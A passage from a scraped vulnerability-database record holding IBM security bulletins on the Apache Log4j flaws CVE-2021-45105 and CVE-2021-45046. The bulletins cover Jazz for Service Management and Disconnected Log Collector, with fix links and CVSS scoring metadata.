Upgrade to any of the following: [1.1.3-TIV-JazzSM-multi-FP007, ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" )[1.1.3-TIV-JazzSM-multi-FP008, ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" )[1.1.3-TIV-JazzSM-multi-FP009, ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" )[1.1.3-TIV-JazzSM-multi-FP010](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" ), [1.1.3-TIV-JazzSM-multi-FP011](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" ), [1.1.3-TIV-JazzSM-multi-FP012](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" ), [1.1.3-TIV-JazzSM-multi-FP013](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"\" )\n\n2\\. 
Install [1.1.3.13-TIV-JazzSM-DASH-iFix-0002.](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" ) (This fix supersedes 1.1.3.13-TIV-JazzSM-DASH-iFix-0001) \n \nJazz for Service Management versions 1.1.3.7 - 1.1.3.13 | \n\n**Note:** 1.1.3.13-TIV-JazzSM-DASH-iFix-0002 has been superseded by [1.1.3.13-TIV-JazzSM-DASH-iFix-0003](<https://www.ibm.com/support/pages/node/6536710> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" )\n\n1\\. Install [1.1.3.13-TIV-JazzSM-DASH-iFix-0003](<https://www.ibm.com/support/pages/node/6536710> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" )[.](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSEKCU\",\"label\":\"Jazz for Service Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.1.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-10T16:52:58", "type": "ibm", "title": "Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerabilities(CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-06-10T16:52:58", "id": "092A442A77CDFE46ED83F2F7A7AEC07007442443AE7B6D28BB557D1A8FE3BBB2", "href": "https://www.ibm.com/support/pages/node/6536710", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:32", "description": "## Summary\n\nApache Log4j is used by IBM\u00ae Disconnected Log Collector to log system events. This bulletin provides a remediation for the vulnerabilities, CVE-2021-45105 and CVE-2021-45046 by upgrading IBM\u00ae Disconnected Log Collector and thus addressing the exposure to the Apache Log4j vulnerabilities. The fix includes Apache Log4j v.2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Disconnected Log Collector| v1 - v1.7.1 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now, refer to [IBM Disconnected Log Collector v1.7.2](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=DLC-1.7.2&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM Disconnected Log Collector v1.7.2\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will 
ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBQAC\",\"label\":\"IBM QRadar SIEM\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.7.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImp